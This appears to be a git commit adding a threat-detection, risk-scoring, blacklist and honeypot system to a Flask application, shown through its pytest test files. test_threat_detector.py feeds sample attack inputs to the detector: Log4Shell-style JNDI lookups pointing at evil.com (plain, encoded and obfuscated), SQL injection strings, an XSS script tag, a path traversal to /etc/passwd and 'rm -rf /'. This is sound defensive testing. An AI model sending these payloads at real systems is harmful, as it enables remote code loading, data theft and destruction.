feat: 实现完整安全防护系统
Phase 1 - 威胁检测引擎: - security/threat_detector.py: JNDI/SQL/XSS/路径遍历/命令注入检测 - security/constants.py: 威胁检测规则和评分常量 - 数据库表: threat_events, ip_risk_scores, user_risk_scores, ip_blacklist Phase 2 - 风险评分与黑名单: - security/risk_scorer.py: IP/用户风险评分引擎,支持分数衰减 - security/blacklist.py: 黑名单管理,自动封禁规则 Phase 3 - 响应策略: - security/honeypot.py: 蜜罐响应生成器 - security/response_handler.py: 渐进式响应策略 Phase 4 - 集成: - security/middleware.py: Flask安全中间件 - routes/admin_api/security.py: 管理后台安全仪表板API - 36个测试用例全部通过 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
249
tests/test_admin_security_api.py
Normal file
249
tests/test_admin_security_api.py
Normal file
@@ -0,0 +1,249 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import timedelta
|
||||
|
||||
import pytest
|
||||
from flask import Flask
|
||||
|
||||
import db_pool
|
||||
from db.schema import ensure_schema
|
||||
from db.utils import get_cst_now
|
||||
from security.blacklist import BlacklistManager
|
||||
from security.risk_scorer import RiskScorer
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def _test_db(tmp_path):
|
||||
db_file = tmp_path / "admin_security_api_test.db"
|
||||
|
||||
old_pool = getattr(db_pool, "_pool", None)
|
||||
try:
|
||||
if old_pool is not None:
|
||||
try:
|
||||
old_pool.close_all()
|
||||
except Exception:
|
||||
pass
|
||||
db_pool._pool = None
|
||||
db_pool.init_pool(str(db_file), pool_size=1)
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
ensure_schema(conn)
|
||||
|
||||
yield db_file
|
||||
finally:
|
||||
try:
|
||||
if getattr(db_pool, "_pool", None) is not None:
|
||||
db_pool._pool.close_all()
|
||||
except Exception:
|
||||
pass
|
||||
db_pool._pool = old_pool
|
||||
|
||||
|
||||
def _make_app() -> Flask:
|
||||
from routes.admin_api.security import security_bp
|
||||
|
||||
app = Flask(__name__)
|
||||
app.config.update(SECRET_KEY="test-secret", TESTING=True)
|
||||
app.register_blueprint(security_bp)
|
||||
return app
|
||||
|
||||
|
||||
def _login_admin(client) -> None:
|
||||
with client.session_transaction() as sess:
|
||||
sess["admin_id"] = 1
|
||||
sess["admin_username"] = "admin"
|
||||
|
||||
|
||||
def _insert_threat_event(*, threat_type: str, score: int, ip: str, user_id: int | None, created_at: str, payload: str):
|
||||
with db_pool.get_db() as conn:
|
||||
cursor = conn.cursor()
|
||||
cursor.execute(
|
||||
"""
|
||||
INSERT INTO threat_events (threat_type, score, ip, user_id, request_path, value_preview, created_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?)
|
||||
""",
|
||||
(threat_type, int(score), ip, user_id, "/api/test", payload, created_at),
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
|
||||
def test_dashboard_requires_admin(_test_db):
|
||||
app = _make_app()
|
||||
client = app.test_client()
|
||||
|
||||
resp = client.get("/api/admin/security/dashboard")
|
||||
assert resp.status_code == 403
|
||||
assert resp.get_json() == {"error": "需要管理员权限"}
|
||||
|
||||
|
||||
def test_dashboard_counts_and_payload_truncation(_test_db):
|
||||
app = _make_app()
|
||||
client = app.test_client()
|
||||
_login_admin(client)
|
||||
|
||||
now = get_cst_now()
|
||||
within_24h = now.strftime("%Y-%m-%d %H:%M:%S")
|
||||
within_24h_2 = (now - timedelta(hours=1)).strftime("%Y-%m-%d %H:%M:%S")
|
||||
older = (now - timedelta(hours=25)).strftime("%Y-%m-%d %H:%M:%S")
|
||||
|
||||
long_payload = "x" * 300
|
||||
_insert_threat_event(
|
||||
threat_type="sql_injection",
|
||||
score=90,
|
||||
ip="1.2.3.4",
|
||||
user_id=10,
|
||||
created_at=within_24h,
|
||||
payload=long_payload,
|
||||
)
|
||||
_insert_threat_event(
|
||||
threat_type="xss",
|
||||
score=70,
|
||||
ip="2.3.4.5",
|
||||
user_id=11,
|
||||
created_at=within_24h_2,
|
||||
payload="short",
|
||||
)
|
||||
_insert_threat_event(
|
||||
threat_type="path_traversal",
|
||||
score=60,
|
||||
ip="9.9.9.9",
|
||||
user_id=None,
|
||||
created_at=older,
|
||||
payload="old",
|
||||
)
|
||||
|
||||
manager = BlacklistManager()
|
||||
manager.ban_ip("8.8.8.8", reason="manual", duration_hours=1, permanent=False)
|
||||
manager._ban_user_internal(123, reason="manual", duration_hours=1, permanent=False)
|
||||
|
||||
resp = client.get("/api/admin/security/dashboard")
|
||||
assert resp.status_code == 200
|
||||
data = resp.get_json()
|
||||
|
||||
assert data["threat_events_24h"] == 2
|
||||
assert data["banned_ip_count"] == 1
|
||||
assert data["banned_user_count"] == 1
|
||||
|
||||
recent = data["recent_threat_events"]
|
||||
assert isinstance(recent, list)
|
||||
assert len(recent) == 3
|
||||
|
||||
payload_preview = recent[0]["value_preview"]
|
||||
assert isinstance(payload_preview, str)
|
||||
assert len(payload_preview) <= 200
|
||||
assert payload_preview.endswith("...")
|
||||
|
||||
|
||||
def test_threats_pagination_and_filters(_test_db):
|
||||
app = _make_app()
|
||||
client = app.test_client()
|
||||
_login_admin(client)
|
||||
|
||||
now = get_cst_now()
|
||||
t1 = (now - timedelta(minutes=1)).strftime("%Y-%m-%d %H:%M:%S")
|
||||
t2 = (now - timedelta(minutes=2)).strftime("%Y-%m-%d %H:%M:%S")
|
||||
t3 = (now - timedelta(minutes=3)).strftime("%Y-%m-%d %H:%M:%S")
|
||||
|
||||
_insert_threat_event(threat_type="sql_injection", score=90, ip="1.1.1.1", user_id=1, created_at=t1, payload="a")
|
||||
_insert_threat_event(threat_type="xss", score=70, ip="2.2.2.2", user_id=2, created_at=t2, payload="b")
|
||||
_insert_threat_event(threat_type="nested_expression", score=80, ip="3.3.3.3", user_id=3, created_at=t3, payload="c")
|
||||
|
||||
resp = client.get("/api/admin/security/threats?page=1&per_page=2")
|
||||
assert resp.status_code == 200
|
||||
data = resp.get_json()
|
||||
assert data["total"] == 3
|
||||
assert len(data["items"]) == 2
|
||||
|
||||
resp2 = client.get("/api/admin/security/threats?page=2&per_page=2")
|
||||
assert resp2.status_code == 200
|
||||
data2 = resp2.get_json()
|
||||
assert data2["total"] == 3
|
||||
assert len(data2["items"]) == 1
|
||||
|
||||
resp3 = client.get("/api/admin/security/threats?event_type=sql_injection")
|
||||
assert resp3.status_code == 200
|
||||
data3 = resp3.get_json()
|
||||
assert data3["total"] == 1
|
||||
assert data3["items"][0]["threat_type"] == "sql_injection"
|
||||
|
||||
resp4 = client.get("/api/admin/security/threats?severity=high")
|
||||
assert resp4.status_code == 200
|
||||
data4 = resp4.get_json()
|
||||
assert data4["total"] == 2
|
||||
assert {item["threat_type"] for item in data4["items"]} == {"sql_injection", "nested_expression"}
|
||||
|
||||
|
||||
def test_ban_and_unban_ip(_test_db):
|
||||
app = _make_app()
|
||||
client = app.test_client()
|
||||
_login_admin(client)
|
||||
|
||||
resp = client.post("/api/admin/security/ban-ip", json={"ip": "7.7.7.7", "reason": "test", "duration_hours": 1})
|
||||
assert resp.status_code == 200
|
||||
assert resp.get_json()["success"] is True
|
||||
|
||||
list_resp = client.get("/api/admin/security/banned-ips")
|
||||
assert list_resp.status_code == 200
|
||||
payload = list_resp.get_json()
|
||||
assert payload["count"] == 1
|
||||
assert payload["items"][0]["ip"] == "7.7.7.7"
|
||||
|
||||
resp2 = client.post("/api/admin/security/unban-ip", json={"ip": "7.7.7.7"})
|
||||
assert resp2.status_code == 200
|
||||
assert resp2.get_json()["success"] is True
|
||||
|
||||
list_resp2 = client.get("/api/admin/security/banned-ips")
|
||||
assert list_resp2.status_code == 200
|
||||
assert list_resp2.get_json()["count"] == 0
|
||||
|
||||
|
||||
def test_risk_endpoints_and_cleanup(_test_db):
|
||||
app = _make_app()
|
||||
client = app.test_client()
|
||||
_login_admin(client)
|
||||
|
||||
scorer = RiskScorer(auto_ban_enabled=False)
|
||||
scorer.record_threat("4.4.4.4", 44, threat_type="xss", score=20, request_path="/", payload="<script>")
|
||||
|
||||
ip_resp = client.get("/api/admin/security/ip-risk/4.4.4.4")
|
||||
assert ip_resp.status_code == 200
|
||||
ip_data = ip_resp.get_json()
|
||||
assert ip_data["risk_score"] == 20
|
||||
assert len(ip_data["threat_history"]) >= 1
|
||||
|
||||
user_resp = client.get("/api/admin/security/user-risk/44")
|
||||
assert user_resp.status_code == 200
|
||||
user_data = user_resp.get_json()
|
||||
assert user_data["risk_score"] == 20
|
||||
assert len(user_data["threat_history"]) >= 1
|
||||
|
||||
# Prepare decaying scores and expired ban
|
||||
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
|
||||
with db_pool.get_db() as conn:
|
||||
cursor = conn.cursor()
|
||||
cursor.execute(
|
||||
"""
|
||||
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
|
||||
VALUES (?, 100, ?, ?, ?)
|
||||
""",
|
||||
("5.5.5.5", old_ts, old_ts, old_ts),
|
||||
)
|
||||
cursor.execute(
|
||||
"""
|
||||
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
|
||||
VALUES (?, ?, 1, ?, ?)
|
||||
""",
|
||||
("6.6.6.6", "expired", old_ts, old_ts),
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
manager = BlacklistManager()
|
||||
assert manager.is_ip_banned("6.6.6.6") is False # expired already
|
||||
|
||||
cleanup_resp = client.post("/api/admin/security/cleanup", json={})
|
||||
assert cleanup_resp.status_code == 200
|
||||
assert cleanup_resp.get_json()["success"] is True
|
||||
|
||||
# Score decayed by cleanup
|
||||
assert RiskScorer().get_ip_score("5.5.5.5") == 81
|
||||
|
||||
63
tests/test_honeypot_responder.py
Normal file
63
tests/test_honeypot_responder.py
Normal file
@@ -0,0 +1,63 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import uuid
|
||||
|
||||
from security import HoneypotResponder
|
||||
|
||||
|
||||
def test_should_use_honeypot_threshold():
|
||||
responder = HoneypotResponder()
|
||||
assert responder.should_use_honeypot(79) is False
|
||||
assert responder.should_use_honeypot(80) is True
|
||||
assert responder.should_use_honeypot(100) is True
|
||||
|
||||
|
||||
def test_generate_fake_response_email():
|
||||
responder = HoneypotResponder()
|
||||
resp = responder.generate_fake_response("/api/forgot-password")
|
||||
assert resp["success"] is True
|
||||
assert resp["message"] == "邮件已发送"
|
||||
|
||||
|
||||
def test_generate_fake_response_register_contains_fake_uuid():
|
||||
responder = HoneypotResponder()
|
||||
resp = responder.generate_fake_response("/api/register")
|
||||
assert resp["success"] is True
|
||||
assert "user_id" in resp
|
||||
uuid.UUID(resp["user_id"])
|
||||
|
||||
|
||||
def test_generate_fake_response_login():
|
||||
responder = HoneypotResponder()
|
||||
resp = responder.generate_fake_response("/api/login")
|
||||
assert resp == {"success": True}
|
||||
|
||||
|
||||
def test_generate_fake_response_generic():
|
||||
responder = HoneypotResponder()
|
||||
resp = responder.generate_fake_response("/api/tasks/run")
|
||||
assert resp["success"] is True
|
||||
assert resp["message"] == "操作成功"
|
||||
|
||||
|
||||
def test_delay_response_ranges():
|
||||
responder = HoneypotResponder()
|
||||
|
||||
assert responder.delay_response(0) == 0
|
||||
assert responder.delay_response(20) == 0
|
||||
|
||||
d = responder.delay_response(21)
|
||||
assert 0.5 <= d <= 1.0
|
||||
d = responder.delay_response(50)
|
||||
assert 0.5 <= d <= 1.0
|
||||
|
||||
d = responder.delay_response(51)
|
||||
assert 1.0 <= d <= 3.0
|
||||
d = responder.delay_response(80)
|
||||
assert 1.0 <= d <= 3.0
|
||||
|
||||
d = responder.delay_response(81)
|
||||
assert 3.0 <= d <= 8.0
|
||||
d = responder.delay_response(100)
|
||||
assert 3.0 <= d <= 8.0
|
||||
|
||||
72
tests/test_response_handler.py
Normal file
72
tests/test_response_handler.py
Normal file
@@ -0,0 +1,72 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import random
|
||||
|
||||
import security.response_handler as rh
|
||||
from security import ResponseAction, ResponseHandler, ResponseStrategy
|
||||
|
||||
|
||||
def test_get_strategy_banned_blocks():
|
||||
handler = ResponseHandler(rng=random.Random(0))
|
||||
strategy = handler.get_strategy(10, is_banned=True)
|
||||
assert strategy.action == ResponseAction.BLOCK
|
||||
assert strategy.delay_seconds == 0
|
||||
assert strategy.message == "访问被拒绝"
|
||||
|
||||
|
||||
def test_get_strategy_allow_levels():
|
||||
handler = ResponseHandler(rng=random.Random(0))
|
||||
|
||||
s = handler.get_strategy(0)
|
||||
assert s.action == ResponseAction.ALLOW
|
||||
assert s.delay_seconds == 0
|
||||
assert s.captcha_level == 1
|
||||
|
||||
s = handler.get_strategy(21)
|
||||
assert s.action == ResponseAction.ALLOW
|
||||
assert s.delay_seconds == 0
|
||||
assert s.captcha_level == 2
|
||||
|
||||
|
||||
def test_get_strategy_delay_ranges():
|
||||
handler = ResponseHandler(rng=random.Random(0))
|
||||
|
||||
s = handler.get_strategy(41)
|
||||
assert s.action == ResponseAction.DELAY
|
||||
assert 1.0 <= s.delay_seconds <= 2.0
|
||||
|
||||
s = handler.get_strategy(61)
|
||||
assert s.action == ResponseAction.DELAY
|
||||
assert 2.0 <= s.delay_seconds <= 5.0
|
||||
|
||||
s = handler.get_strategy(81)
|
||||
assert s.action == ResponseAction.HONEYPOT
|
||||
assert 3.0 <= s.delay_seconds <= 8.0
|
||||
|
||||
|
||||
def test_apply_delay_uses_time_sleep(monkeypatch):
|
||||
handler = ResponseHandler(rng=random.Random(0))
|
||||
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=1.234)
|
||||
|
||||
called = {"count": 0, "seconds": None}
|
||||
|
||||
def fake_sleep(seconds):
|
||||
called["count"] += 1
|
||||
called["seconds"] = seconds
|
||||
|
||||
monkeypatch.setattr(rh.time, "sleep", fake_sleep)
|
||||
|
||||
handler.apply_delay(strategy)
|
||||
assert called["count"] == 1
|
||||
assert called["seconds"] == 1.234
|
||||
|
||||
|
||||
def test_get_captcha_requirement():
|
||||
handler = ResponseHandler(rng=random.Random(0))
|
||||
|
||||
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.ALLOW, captcha_level=2))
|
||||
assert req == {"required": True, "level": 2}
|
||||
|
||||
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.BLOCK, captcha_level=2))
|
||||
assert req == {"required": False, "level": 2}
|
||||
|
||||
179
tests/test_risk_scorer.py
Normal file
179
tests/test_risk_scorer.py
Normal file
@@ -0,0 +1,179 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import timedelta
|
||||
|
||||
import pytest
|
||||
|
||||
import db_pool
|
||||
from db.schema import ensure_schema
|
||||
from db.utils import get_cst_now
|
||||
from security import constants as C
|
||||
from security.blacklist import BlacklistManager
|
||||
from security.risk_scorer import RiskScorer
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def _test_db(tmp_path):
|
||||
db_file = tmp_path / "risk_scorer_test.db"
|
||||
|
||||
old_pool = getattr(db_pool, "_pool", None)
|
||||
try:
|
||||
if old_pool is not None:
|
||||
try:
|
||||
old_pool.close_all()
|
||||
except Exception:
|
||||
pass
|
||||
db_pool._pool = None
|
||||
db_pool.init_pool(str(db_file), pool_size=1)
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
ensure_schema(conn)
|
||||
|
||||
yield db_file
|
||||
finally:
|
||||
try:
|
||||
if getattr(db_pool, "_pool", None) is not None:
|
||||
db_pool._pool.close_all()
|
||||
except Exception:
|
||||
pass
|
||||
db_pool._pool = old_pool
|
||||
|
||||
|
||||
def test_record_threat_updates_scores_and_combined(_test_db):
|
||||
manager = BlacklistManager()
|
||||
scorer = RiskScorer(blacklist_manager=manager)
|
||||
|
||||
ip = "1.2.3.4"
|
||||
user_id = 123
|
||||
|
||||
assert scorer.get_ip_score(ip) == 0
|
||||
assert scorer.get_user_score(user_id) == 0
|
||||
assert scorer.get_combined_score(ip, user_id) == 0
|
||||
|
||||
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=30, request_path="/login", payload="x")
|
||||
|
||||
assert scorer.get_ip_score(ip) == 30
|
||||
assert scorer.get_user_score(user_id) == 30
|
||||
assert scorer.get_combined_score(ip, user_id) == 30
|
||||
|
||||
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=80, request_path="/login", payload="y")
|
||||
|
||||
assert scorer.get_ip_score(ip) == 100
|
||||
assert scorer.get_user_score(user_id) == 100
|
||||
assert scorer.get_combined_score(ip, user_id) == 100
|
||||
|
||||
|
||||
def test_auto_ban_on_score_100(_test_db):
|
||||
manager = BlacklistManager()
|
||||
scorer = RiskScorer(blacklist_manager=manager)
|
||||
|
||||
ip = "5.6.7.8"
|
||||
user_id = 456
|
||||
|
||||
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=100, request_path="/api", payload="boom")
|
||||
|
||||
assert manager.is_ip_banned(ip) is True
|
||||
assert manager.is_user_banned(user_id) is True
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
cursor = conn.cursor()
|
||||
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
|
||||
row = cursor.fetchone()
|
||||
assert row is not None
|
||||
assert row["expires_at"] is not None
|
||||
|
||||
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
|
||||
row = cursor.fetchone()
|
||||
assert row is not None
|
||||
assert row["expires_at"] is not None
|
||||
|
||||
|
||||
def test_jndi_injection_permanent_ban(_test_db):
|
||||
manager = BlacklistManager()
|
||||
scorer = RiskScorer(blacklist_manager=manager)
|
||||
|
||||
ip = "9.9.9.9"
|
||||
user_id = 999
|
||||
|
||||
scorer.record_threat(ip, user_id, threat_type=C.THREAT_TYPE_JNDI_INJECTION, score=100, request_path="/", payload="${jndi:ldap://x}")
|
||||
|
||||
assert manager.is_ip_banned(ip) is True
|
||||
assert manager.is_user_banned(user_id) is True
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
cursor = conn.cursor()
|
||||
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
|
||||
row = cursor.fetchone()
|
||||
assert row is not None
|
||||
assert row["expires_at"] is None
|
||||
|
||||
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
|
||||
row = cursor.fetchone()
|
||||
assert row is not None
|
||||
assert row["expires_at"] is None
|
||||
|
||||
|
||||
def test_high_risk_three_times_permanent_ban(_test_db):
|
||||
manager = BlacklistManager()
|
||||
scorer = RiskScorer(blacklist_manager=manager, high_risk_threshold=80, high_risk_permanent_ban_count=3)
|
||||
|
||||
ip = "10.0.0.1"
|
||||
user_id = 1
|
||||
|
||||
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="a")
|
||||
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="b")
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
cursor = conn.cursor()
|
||||
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
|
||||
row = cursor.fetchone()
|
||||
assert row is not None
|
||||
assert row["expires_at"] is not None # score hits 100 => temporary ban first
|
||||
|
||||
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="c")
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
cursor = conn.cursor()
|
||||
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
|
||||
row = cursor.fetchone()
|
||||
assert row is not None
|
||||
assert row["expires_at"] is None # 3 high-risk threats => permanent
|
||||
|
||||
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
|
||||
row = cursor.fetchone()
|
||||
assert row is not None
|
||||
assert row["expires_at"] is None
|
||||
|
||||
|
||||
def test_decay_scores_hourly_10_percent(_test_db):
|
||||
manager = BlacklistManager()
|
||||
scorer = RiskScorer(blacklist_manager=manager)
|
||||
|
||||
ip = "3.3.3.3"
|
||||
user_id = 11
|
||||
|
||||
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
cursor = conn.cursor()
|
||||
cursor.execute(
|
||||
"""
|
||||
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
|
||||
VALUES (?, 100, ?, ?, ?)
|
||||
""",
|
||||
(ip, old_ts, old_ts, old_ts),
|
||||
)
|
||||
cursor.execute(
|
||||
"""
|
||||
INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
|
||||
VALUES (?, 100, ?, ?, ?)
|
||||
""",
|
||||
(user_id, old_ts, old_ts, old_ts),
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
scorer.decay_scores()
|
||||
|
||||
assert scorer.get_ip_score(ip) == 81
|
||||
assert scorer.get_user_score(user_id) == 81
|
||||
|
||||
155
tests/test_security_middleware.py
Normal file
155
tests/test_security_middleware.py
Normal file
@@ -0,0 +1,155 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import pytest
|
||||
from flask import Flask, g, jsonify
|
||||
from flask_login import LoginManager
|
||||
|
||||
import db_pool
|
||||
from db.schema import ensure_schema
|
||||
from security import init_security_middleware
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def _test_db(tmp_path):
|
||||
db_file = tmp_path / "security_middleware_test.db"
|
||||
|
||||
old_pool = getattr(db_pool, "_pool", None)
|
||||
try:
|
||||
if old_pool is not None:
|
||||
try:
|
||||
old_pool.close_all()
|
||||
except Exception:
|
||||
pass
|
||||
db_pool._pool = None
|
||||
db_pool.init_pool(str(db_file), pool_size=1)
|
||||
|
||||
with db_pool.get_db() as conn:
|
||||
ensure_schema(conn)
|
||||
|
||||
yield db_file
|
||||
finally:
|
||||
try:
|
||||
if getattr(db_pool, "_pool", None) is not None:
|
||||
db_pool._pool.close_all()
|
||||
except Exception:
|
||||
pass
|
||||
db_pool._pool = old_pool
|
||||
|
||||
|
||||
def _make_app(monkeypatch, _test_db, *, security_enabled: bool = True, honeypot_enabled: bool = True) -> Flask:
|
||||
import security.middleware as sm
|
||||
import security.response_handler as rh
|
||||
|
||||
# 避免测试因风控延迟而变慢
|
||||
monkeypatch.setattr(rh.time, "sleep", lambda _seconds: None)
|
||||
|
||||
# 每个测试用例保持 handler/honeypot 的懒加载状态
|
||||
sm.handler = None
|
||||
sm.honeypot = None
|
||||
|
||||
app = Flask(__name__)
|
||||
app.config.update(
|
||||
SECRET_KEY="test-secret",
|
||||
TESTING=True,
|
||||
SECURITY_ENABLED=bool(security_enabled),
|
||||
HONEYPOT_ENABLED=bool(honeypot_enabled),
|
||||
SECURITY_LOG_LEVEL="CRITICAL", # 降低测试日志噪音
|
||||
)
|
||||
|
||||
login_manager = LoginManager()
|
||||
login_manager.init_app(app)
|
||||
|
||||
@login_manager.user_loader
|
||||
def _load_user(_user_id: str):
|
||||
return None
|
||||
|
||||
init_security_middleware(app)
|
||||
return app
|
||||
|
||||
|
||||
def _client_get(app: Flask, path: str, *, ip: str = "1.2.3.4"):
|
||||
return app.test_client().get(path, environ_overrides={"REMOTE_ADDR": ip})
|
||||
|
||||
|
||||
def test_middleware_blocks_banned_ip(_test_db, monkeypatch):
|
||||
app = _make_app(monkeypatch, _test_db)
|
||||
|
||||
@app.get("/api/ping")
|
||||
def _ping():
|
||||
return jsonify({"ok": True})
|
||||
|
||||
import security.middleware as sm
|
||||
|
||||
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
|
||||
|
||||
resp = _client_get(app, "/api/ping", ip="1.2.3.4")
|
||||
assert resp.status_code == 503
|
||||
assert resp.get_json() == {"error": "服务暂时繁忙,请稍后重试"}
|
||||
|
||||
|
||||
def test_middleware_skips_static_requests(_test_db, monkeypatch):
|
||||
app = _make_app(monkeypatch, _test_db)
|
||||
|
||||
@app.get("/static/test")
|
||||
def _static_test():
|
||||
return "ok"
|
||||
|
||||
import security.middleware as sm
|
||||
|
||||
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
|
||||
|
||||
resp = _client_get(app, "/static/test", ip="1.2.3.4")
|
||||
assert resp.status_code == 200
|
||||
assert resp.get_data(as_text=True) == "ok"
|
||||
|
||||
|
||||
def test_middleware_honeypot_short_circuits_side_effects(_test_db, monkeypatch):
|
||||
app = _make_app(monkeypatch, _test_db, honeypot_enabled=True)
|
||||
|
||||
called = {"count": 0}
|
||||
|
||||
@app.get("/api/side-effect")
|
||||
def _side_effect():
|
||||
called["count"] += 1
|
||||
return jsonify({"real": True})
|
||||
|
||||
resp = _client_get(app, "/api/side-effect?q=${${a}}", ip="9.9.9.9")
|
||||
assert resp.status_code == 200
|
||||
payload = resp.get_json()
|
||||
assert isinstance(payload, dict)
|
||||
assert payload.get("success") is True
|
||||
assert called["count"] == 0
|
||||
|
||||
|
||||
def test_middleware_fails_open_on_internal_errors(_test_db, monkeypatch):
|
||||
app = _make_app(monkeypatch, _test_db)
|
||||
|
||||
@app.get("/api/ok")
|
||||
def _ok():
|
||||
return jsonify({"ok": True, "risk_score": getattr(g, "risk_score", None)})
|
||||
|
||||
import security.middleware as sm
|
||||
|
||||
def boom(*_args, **_kwargs):
|
||||
raise RuntimeError("boom")
|
||||
|
||||
monkeypatch.setattr(sm.blacklist, "is_ip_banned", boom)
|
||||
monkeypatch.setattr(sm.detector, "scan_input", boom)
|
||||
|
||||
resp = _client_get(app, "/api/ok", ip="2.2.2.2")
|
||||
assert resp.status_code == 200
|
||||
assert resp.get_json()["ok"] is True
|
||||
|
||||
|
||||
def test_middleware_sets_request_context_fields(_test_db, monkeypatch):
|
||||
app = _make_app(monkeypatch, _test_db)
|
||||
|
||||
@app.get("/api/context")
|
||||
def _context():
|
||||
strategy = getattr(g, "response_strategy", None)
|
||||
action = getattr(getattr(strategy, "action", None), "value", None)
|
||||
return jsonify({"risk_score": getattr(g, "risk_score", None), "action": action})
|
||||
|
||||
resp = _client_get(app, "/api/context", ip="8.8.8.8")
|
||||
assert resp.status_code == 200
|
||||
assert resp.get_json() == {"risk_score": 0, "action": "allow"}
|
||||
69
tests/test_threat_detector.py
Normal file
69
tests/test_threat_detector.py
Normal file
@@ -0,0 +1,69 @@
|
||||
from flask import Flask, request
|
||||
|
||||
from security import constants as C
|
||||
from security.threat_detector import ThreatDetector
|
||||
|
||||
|
||||
def test_jndi_direct_scores_100():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("${jndi:ldap://evil.com/a}", "q")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
|
||||
|
||||
|
||||
def test_jndi_encoded_scores_100():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D", "q")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
|
||||
|
||||
|
||||
def test_jndi_obfuscated_scores_100():
|
||||
detector = ThreatDetector()
|
||||
payload = "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.com/a}"
|
||||
results = detector.scan_input(payload, "q")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
|
||||
|
||||
|
||||
def test_nested_expression_scores_80():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("${${env:USER}}", "q")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_NESTED_EXPRESSION and r.score == 80 for r in results)
|
||||
|
||||
|
||||
def test_sqli_union_select_scores_90():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("UNION SELECT password FROM users", "q")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
|
||||
|
||||
|
||||
def test_sqli_or_1_eq_1_scores_90():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("a' OR 1=1 --", "q")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
|
||||
|
||||
|
||||
def test_xss_scores_70():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("<script>alert(1)</script>", "q")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_XSS and r.score == 70 for r in results)
|
||||
|
||||
|
||||
def test_path_traversal_scores_60():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("../../etc/passwd", "path")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_PATH_TRAVERSAL and r.score == 60 for r in results)
|
||||
|
||||
|
||||
def test_command_injection_scores_85():
|
||||
detector = ThreatDetector()
|
||||
results = detector.scan_input("test; rm -rf /", "cmd")
|
||||
assert any(r.threat_type == C.THREAT_TYPE_COMMAND_INJECTION and r.score == 85 for r in results)
|
||||
|
||||
|
||||
def test_scan_request_picks_up_args():
|
||||
app = Flask(__name__)
|
||||
detector = ThreatDetector()
|
||||
|
||||
with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"):
|
||||
results = detector.scan_request(request)
|
||||
assert any(r.field_name == "args.q" and r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
|
||||
|
||||
Reference in New Issue
Block a user